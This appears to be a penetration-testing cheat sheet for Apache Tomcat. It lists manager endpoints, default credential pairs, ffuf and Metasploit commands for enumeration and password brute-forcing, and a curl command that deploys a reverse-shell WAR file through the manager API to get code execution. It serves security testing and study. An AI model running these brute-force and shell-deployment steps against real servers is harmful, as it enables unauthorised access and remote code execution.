Apache Tomcat Pentesting
Apache Tomcat is an implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies.
Directories
Below are common directories for Apache Tomcat.
/examples
/examples/jsp/cal/login.html
/examples/jsp/error/error.html
/examples/jsp/snp/snoop.jsp
/examples/servlet/HelloWorldEXample
/examples/servlet/JndiServlet
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestParamExample
/host-manager
/manager
/manager/jmxproxy/?qry=STUFF
/manager/status
/manager/status/all
# We can execute commands in /manager/text/ directory
/manager/text/{command}?{parameters}
/manager/text/deploy?path=/foo
/manager/text/list
/manager/text/resources
/manager/text/serverinfo
/manager/text/vminfo
Directory Discovery
To enumerate directories automatically, use fuzzing tools.
ffuf -u https://example.com/FUZZ -w directories.txt
ffuf -u https://example.com/host-manager/FUZZ -w
ffuf -u https://example.com/manager/FUZZ -w directories.txt
Credentials
Below are common credentials for the manager app in Tomcat.
admin:(empty)
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat
User Enumeration
# Metasploit
msf> use auxiliary/scanner/http/tomcat_enum
msf> set TARGETURI /manager # depending on the website
Brute Force Credentials
ffuf -u https://tomcat:FUZZ@example.com/manager -w passwords.txt -fs 140
# Metasploit
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf> set VHOST example.local
msf> set stop_on_success true
msf> set username tomcat
msf> set RHOSTS <target-ip>
Remote Code Execution (RCE)
Using Metasploit
Uploading WAR file (Reverse Shell)
First create a war file using Msfvenom.
Then upload this file.
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"
Start a listener in local machine.
Now access to https://example.com/shell
.
We should get a shell.
Investigation From Inside
If we are in the target system, we can retrieve information about credentials.